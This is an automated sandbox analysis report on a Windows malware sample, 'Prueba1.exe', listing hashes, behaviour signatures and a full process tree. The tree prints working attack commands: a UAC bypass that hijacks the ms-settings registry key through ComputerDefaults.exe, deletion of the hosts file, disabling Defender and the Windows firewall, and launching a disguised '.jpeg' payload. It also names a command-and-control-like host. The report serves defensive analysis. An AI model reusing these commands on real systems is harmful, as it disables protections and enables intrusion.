Resubmissions

25/09/2024, 17:58

240925-wkcztasbrd 8

25/09/2024, 17:55

240925-wheqmasarb 8

Analysis

  • max time kernel
    1793s
  • max time network
    1161s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/09/2024, 17:58

General

  • Target

    Prueba1.exe

  • Size

    227KB

  • MD5

    4339cc7cb7c8df84a3a1bbd3cba4cf17

  • SHA1

    b041a7ac27006a3d204726cecef465a34f06a3f3

  • SHA256

    e3ebbde456c0c20d1436661909137cd38ce6be51cf78e7cb0d2944b124bed326

  • SHA512

    3e795d43daa63db9435ab3d03a6800719f25b1f8311188148c5ac51eea1835ca76a6fb10040559271e42de7b3d5e18dda89a572fb975ee60f6a90d1575a85f31

  • SSDEEP

    3072:W+PSS5WcZM55FjBcmnE2V/anyoQI5swjEG6vpRcuKtK41rL2JtjwKk:tPSPX5FWhMwj16xrcKaLWjwKk

Malware Config

Signatures

  • Modifies Windows Firewall 2 TTPs 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 22 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:3516
    • C:\Users\Admin\AppData\Local\Temp\Prueba1.exe
      "C:\Users\Admin\AppData\Local\Temp\Prueba1.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4100
      • C:\Windows\system32\cmd.exe
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:216
        • C:\Windows\system32\reg.exe
          reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          PID:1728
      • C:\Windows\system32\cmd.exe
        /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5036
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\450650.vbs" /f
          4⤵
          • Modifies registry class
          PID:536
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          4⤵
          • Modifies registry class
          PID:1864
      • C:\Windows\system32\cmd.exe
        /c start /B ComputerDefaults.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1720
        • C:\Windows\system32\ComputerDefaults.exe
          ComputerDefaults.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Windows\system32\wscript.exe
            "wscript.exe" C:\Users\Admin\AppData\Local\Temp\450650.vbs
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:4432
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
              6⤵
              PID:2512
      • C:\Windows\system32\cmd.exe
        /c del /f C:\Users\Admin\AppData\Local\Temp\450650.vbs
        3⤵
        PID:4036
      • C:\Windows\system32\cmd.exe
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4944
        • C:\Windows\system32\reg.exe
          reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          • Modifies registry class
          PID:4212
      • C:\Windows\system32\cmd.exe
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4288
        • C:\Windows\system32\reg.exe
          reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          PID:4208
      • C:\Windows\system32\cmd.exe
        /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1628
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\993027.vbs" /f
          4⤵
          • Modifies registry class
          PID:1056
        • C:\Windows\system32\reg.exe
          reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          4⤵
          • Modifies registry class
          PID:8
      • C:\Windows\system32\cmd.exe
        /c start /B ComputerDefaults.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1964
        • C:\Windows\system32\ComputerDefaults.exe
          ComputerDefaults.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Windows\system32\wscript.exe
            "wscript.exe" C:\Users\Admin\AppData\Local\Temp\993027.vbs
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:1612
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3592
              • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe
                C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe 5i7z8k04ztx6gvgv4xrwd5b6tyvejz:ZmbyrFypnUjzwf2LD7LMX006:matchashop.icu
                7⤵
                • Executes dropped EXE
                • Drops file in Windows directory
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:2492
                • C:\Windows\system32\cmd.exe
                  /c attrib +h "C:\Windows\profapi.dll"
                  8⤵
                  • Hide Artifacts: Hidden Files and Directories
                  PID:3572
                  • C:\Windows\system32\attrib.exe
                    attrib +h "C:\Windows\profapi.dll"
                    9⤵
                    • Drops file in Windows directory
                    • Views/modifies file attributes
                    PID:4232
                • C:\Windows\system32\cmd.exe
                  /c REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0 >nul
                  8⤵
                  PID:804
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PolicyManager\default\Privacy\LetAppsAccessLocation\ /f /v Value /t REG_DWORD /d 0
                    9⤵
                    PID:2656
                • C:\Windows\system32\cmd.exe
                  /c powershell Set-MpPreference -DisableRealtimeMonitoring $true >nul 2>&1
                  8⤵
                  PID:992
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    powershell Set-MpPreference -DisableRealtimeMonitoring $true
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1620
                • C:\Windows\system32\cmd.exe
                  /c netsh advfirewall set privateprofile state off >nul 2>&1
                  8⤵
                  PID:3576
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall set privateprofile state off
                    9⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:5076
                • C:\Windows\system32\cmd.exe
                  /c netsh advfirewall set domainprofile state off >nul 2>&1
                  8⤵
                  PID:4432
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall set domainprofile state off
                    9⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:1016
                • C:\Windows\system32\cmd.exe
                  /c netsh advfirewall set publicprofile state off >nul 2>&1
                  8⤵
                  PID:3256
                  • C:\Windows\system32\netsh.exe
                    netsh advfirewall set publicprofile state off
                    9⤵
                    • Modifies Windows Firewall
                    • Event Triggered Execution: Netsh Helper DLL
                    PID:4720
                • C:\Windows\system32\cmd.exe
                  /c REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f >nul
                  8⤵
                  PID:4996
                  • C:\Windows\system32\reg.exe
                    REG DELETE HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\location\NonPackaged /f
                    9⤵
                    PID:4616
                • C:\ProgramData\NakedElephants.jpeg
                  C:\ProgramData\NakedElephants.jpeg FuckHerFace
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:2004
                • C:\ProgramData\NakedElephants.jpeg
                  C:\ProgramData\NakedElephants.jpeg FuckHerFace
                  8⤵
                  • Executes dropped EXE
                  PID:1328
                • C:\ProgramData\NakedElephants.jpeg
                  C:\ProgramData\NakedElephants.jpeg FuckHerFace
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:4100
      • C:\Windows\system32\cmd.exe
        /c del /f C:\Users\Admin\AppData\Local\Temp\993027.vbs
        3⤵
        PID:4596
      • C:\Windows\system32\cmd.exe
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\system32\reg.exe
          reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
          • Modifies registry class
          PID:3924
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      2⤵
      • Checks SCSI registry key(s)
      • Checks processor information in registry
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:2712
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:5064

                            Downloads

                            • C:\ProgramData\NakedElephants.jpeg

                              Filesize

                              38.3MB

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                              Filesize

                              1KB

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

                              Filesize

                              436B

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

                              Filesize

                              174B

                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

                              Filesize

                              170B

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

                              Filesize

                              64KB

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

                              Filesize

                              4B

                            • C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

                              Filesize

                              944B

                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\ZmbyrFypnUjzwf2LD7LMX006.exe

                              Filesize

                              2.8MB

                            • C:\Users\Admin\AppData\Local\Temp\450650.vbs

                              Filesize

                              125B

                            • C:\Users\Admin\AppData\Local\Temp\993027.vbs

                              Filesize

                              241B

                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tdb1ltnn.whl.ps1

                              Filesize

                              60B

                            • C:\Windows\profapi.dll

                              Filesize

                              162KB
